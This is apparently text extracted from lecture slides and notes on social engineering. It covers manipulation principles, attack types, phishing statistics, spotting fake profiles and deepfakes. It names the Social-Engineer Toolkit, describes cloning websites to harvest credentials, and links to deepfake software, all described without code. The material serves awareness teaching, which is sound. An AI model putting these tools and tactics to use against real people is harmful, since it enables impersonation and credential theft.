2. 4
4
Social Engineering Definition
• “… uses psychological manipulation to trick users into making security mistakes or
giving away sensitive information.”
Imperva (Oct 2022) https://www.imperva.com/learn/application-security/social-engineering-attack/
• “… the art of manipulating people so they give up confidential information."
Webroot (Oct 2022) https://www.webroot.com/us/en/resources/tips-articles/what-is-social-engineering
• “… a manipulation technique that exploits human error to gain private information,
access, or valuables ... Once an attacker understands what motivates a user’s
actions, they can deceive and manipulate the user effectively."
Kaspersky (Oct 2022) https://www.kaspersky.com/resource-center/definitions/what-is-social-
engineering
5. 7
Social Engineering Principles
Social Engineering
Principles (Reasons
for Effectiveness)
Authority and Trust
Intimidation
Consensus and
Social Proof
Scarcity
Urgency
Familiarity and Liking
https://xmind.app/embed/ERb5/
6. 8
Model for Social Engineering Attacks
Wang, Z., Zhu, H., & Sun, L. (2021). Social Engineering in
Cybersecurity: Effect Mechanisms, Human Vulnerabilities and
Attack Methods. IEEE Access, 9, 11895–11910.
https://doi.org/10.1109/ACCESS.2021.3051633
7. 9
Model for Social Engineering Attacks
Wang, Z., Zhu, H., & Sun, L. (2021). Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities
and Attack Methods. IEEE Access, 9, 11895–11910. https://doi.org/10.1109/ACCESS.2021.3051633
8. 10
10
Why does it work?
Human Attributes Social Engineering Technique
Trust – Bhutanese’s people are trustworthy where
it is easy to gain trust with victims
• Direct approach
• Technical expert
The desire to be ‘helpful’ – Most of the Bhutanese
people are kind
• Direct Approach
• Technical expert
• Voice of Authority
The wish to get something for nothing • Chain email
• SMS
Curiosity • Open email attachments from unknown
senders
• Spam
Fear of the unknown, or of losing something • Popup window
Ignorance • Direct Approach
• Dumpster diving
https://www.academia.edu/8216745/Social_Engineering_it_s_impact_on_organization
16. 20
20
Let me guess?
• What is 1+1?
• What is 2+2?
• What is 3+3?
• What is 4+4?
• What is 5+5?
• What is 6+6?
• What is 7+7?
• What is 8+8?
• Name a vegetable?
18. 22
22
Social Engineering Attack Framework
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social
engineering attack examples, templates and
scenarios. Computers & Security, 59, 186–209.
https://doi.org/10.1016/j.cose.2016.03.004
19. 23
23
Life cycle of attack
https://www.imperva.com/learn/application-security/social-engineering-attack/
20. 24
Type of attacks
• Pre-texting
• Baiting
• Quid Pro Quo
• Scareware
• Phishing, Smishing, Vishing,
Whaling
• Telephone-oriented Attack
Delivery (TOAD)
• Tailgating
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social
engineering attack examples, templates and
scenarios. Computers & Security, 59, 186–209.
https://doi.org/10.1016/j.cose.2016.03.004
21. 25
25
Phishing statistics
• 18-39yr old's average click rate of 29%, drops to 19%
among older age groups.
• 23% of male participants opened a phishing email
compared to 10% for woman.
• Public sector organizations were the most vulnerable to
phishing attacks (with an average click rate of 36%)
https://betanews.com/2022/10/13/older-generations-are-
less-likely-to-click-phishing-emails/
30. 34
34
How to Detect a Fake Profile
• Profile photo
– Do a search using the image
– https://support.google.com/websearch/answer/1325808
• Username
• The Biography
• Profile content
• Number of followers
31. 35
35
How to Report a Fake Profile
• Twitter
– https://help.twitter.com/en/forms/authenticity/impersonation
• Instagram
– https://help.instagram.com/contact/636276399721841
• Facebook (Meta)
– https://www.facebook.com/help/306643639690823
• LinkedIn
– Click the More icon on the member’s profile.
– Click Report or block.
• TikTok
– Go to the profile of the account you want to report.
– Tap the Settings icon
– Tap “Report” and follow the steps in the app.
34. 38
Deep Fakes
• Deepfake technology allows users to
impersonate others with startling accuracy.
– Deep Video Fakes
(https://youtu.be/kOIMXt8KK8M)
– Deep Voice Fakes
(https://youtu.be/0ybLCfVeFL4)
• Anyone can find deepfake software and services
on the internet and have a relatively convincing
representation of another person within minutes.
– https://github.com/iperov/DeepFaceLab
– https://github.com/sibozhang/Text2Video
• Synthetic Identities are created by applying for
credit using a combination of real and fake, or
sometimes entirely fake, information.
37. 41
Deep Fakes
• … with the help of deepfakes,
fraudsters can orchestrate social
engineering attacks that appear
to come from a friend or
colleague, that is, someone we
know and trust and whose
motives do not need to be
questioned.
Ap Wang Drugye - https://dorjipenjore.files.wordpress.com/2015/09/oral-traditions-and-expressions-yeshi-lhendup.pdf
Adam/ Eve cartoon - https://www.toonpool.com/cartoons/Adam%20and%20Eve_301321#img9
Buddha - https://buddhaweekly.com/meditation-techniques-for-people-with-unsettled-monkey-minds/buddha-weekly-buddha-hand-holds-the-monkey-king-buddhism/
Ap Wang Drugye - https://dorjipenjore.files.wordpress.com/2015/09/oral-traditions-and-expressions-yeshi-lhendup.pdf and https://www.bhutan-discover.de/ueber-bhutan/festivalkalender.html
Historical examples
Adam/Eve, the snake tricks them to eat apple
Buddha tricks Monkey King
Ap Wang Drugye (Bhutanese trickster)
Ap Wang Drugye - https://dorjipenjore.files.wordpress.com/2015/09/oral-traditions-and-expressions-yeshi-lhendup.pdf
https://xmind.app/embed/ERb5/
Z. Wang, H. Zhu and L. Sun, "Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities and Attack Methods," in IEEE Access, vol. 9, pp. 11895-11910, 2021, doi: 10.1109/ACCESS.2021.3051633.
Wang, Z., Zhu, H., & Sun, L. (2021). Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities and Attack Methods. IEEE Access, 9, 11895–11910. https://doi.org/10.1109/ACCESS.2021.3051633
https://ieeexplore-ieee-org.ezproxy.csu.edu.au/stamp/stamp.jsp?tp=&arnumber=9323026
Accessed via Charles Sturt Library search
https://primo.csu.edu.au/discovery/fulldisplay?docid=cdi_ieee_primary_9323026&context=PC&vid=61CSU_INST:61CSU&lang=en&search_scope=MyInst_and_CI&adaptor=Primo%20Central&tab=Everything&query=any,contains,Social%20Engineering%20in%20Cybersecurity:%20Effect%20Mechanisms,%20Human%20Vulnerabilities%20and%20Attack%20Methods&offset=0
Z. Wang, H. Zhu and L. Sun, "Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities and Attack Methods," in IEEE Access, vol. 9, pp. 11895-11910, 2021, doi: 10.1109/ACCESS.2021.3051633.
Wang, Z., Zhu, H., & Sun, L. (2021). Social Engineering in Cybersecurity: Effect Mechanisms, Human Vulnerabilities and Attack Methods. IEEE Access, 9, 11895–11910. https://doi.org/10.1109/ACCESS.2021.3051633
https://ieeexplore-ieee-org.ezproxy.csu.edu.au/stamp/stamp.jsp?tp=&arnumber=9323026
Accessed via Charles Sturt Library search
https://primo.csu.edu.au/discovery/fulldisplay?docid=cdi_ieee_primary_9323026&context=PC&vid=61CSU_INST:61CSU&lang=en&search_scope=MyInst_and_CI&adaptor=Primo%20Central&tab=Everything&query=any,contains,Social%20Engineering%20in%20Cybersecurity:%20Effect%20Mechanisms,%20Human%20Vulnerabilities%20and%20Attack%20Methods&offset=0
https://www.academia.edu/8216745/Social_Engineering_it_s_impact_on_organization
In 2014, Tshewang Dorji wrote in the seminar report “Social Engineering: it’s impact on organization and individual in Bhutan”
$100 Million Google and Facebook Spear Phishing Scam
https://www.theguardian.com/technology/2017/mar/22/phishing-scam-us-tech-companies-tricked-100-million-lithuanian-man
https://twitter.com/fbi/status/1222279332359360512
https://www.justice.gov/usao-sdny/pr/lithuanian-man-sentenced-5-years-prison-theft-over-120-million-fraudulent-business
https://www.ic3.gov/Media/Y2019/PSA190910
Mind-Reading (1)
The "carrot" trick is quite a popular and effective one, but don't question why or how it works. It just does!
How the Trick Is Done:
Write down the word "carrot" on a piece of paper.
Give it to your friend but tell them not to look at it... yet.
Let them hold on to it so they know there's no cheating going on.
Next, ask them "what's 1+1?" and wait for them to answer.
Ask "what's 2+2?" and wait for them to answer.
Keep going until you get to 8+8.
After they answer, ask them to name a vegetable.
Result: 90% of the time they will think of a carrot. They don't realize it, but their answer is already there on the piece of paper you gave them! These mathematical tricks are tools used by mentalists to "read" people's minds. We have two brain functions. When the higher cognitive function is distracted, we revert to a very suggestive state of mind. Some think that this trick works because the counting reminds us of children's books, etc. and carrots are the most common vegetable we learn about as U.S. kids. That said, how exactly it works is frequently under debate.
https://www.imperva.com/learn/application-security/social-engineering-attack/
https://healthitsecurity.com/features/common-types-of-social-engineering-phishing-attacks-in-healthcare
Mouton, F., Leenen, L., & Venter, H. S. (2016). Social engineering attack examples, templates and scenarios. Computers & Security, 59, 186–209. https://doi.org/10.1016/j.cose.2016.03.004
telephone-oriented attack delivery (TOAD)
https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery
https://www.barringtonstoke.co.uk/wp-content/uploads/2019/03/9781781128442.jpg
https://betanews.com/2022/10/13/older-generations-are-less-likely-to-click-phishing-emails/
According to security awareness training company SoSafe, who recently completed some research about phishing attacks
THE SOCIAL-ENGINEER TOOLKIT (SET)
The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering.
SET has a number of custom attack vectors that allow you to make a believable attack quickly. The attacker may clone a legitimate website and trick the victim to visit the link and enter the credentials.
https://securitytrails.com/blog/the-social-engineering-toolkit
lively conversation between
Robert Downey, Jr. (Avengers: Endgame, Dolittle),
George Lucas (Star Wars, Indiana Jones),
Tom Cruise (Mission: Impossible, Edge of Tomorrow),
Ewan McGregor (Doctor Sleep, Obi-Wan), and
Jeff Goldblum (The World According to Jeff Goldblum, Jurassic World 3),
moderated by Mark Ellis (Dog Stepfather).
https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Deepfake-Social-Engineering-Creating-A-Framework-For-Synthetic-Media-Social-Engineering.pdf
https://www.securityweek.com/deepfakes-are-growing-threat-cybersecurity-and-society-Europol
https://www.rapid7.com/blog/post/2021/12/06/deepfakes-a-nascent-cybersecurity-threat/
Rapid 7
In 2019, we identified 40 posts on dark web hacking forums discussing deepfakes.
In 2020, that number rose to 94 posts.
In 2021, we've seen a total of 92 posts so far — this number will likely outpace the prior year's 94 by the end of the year.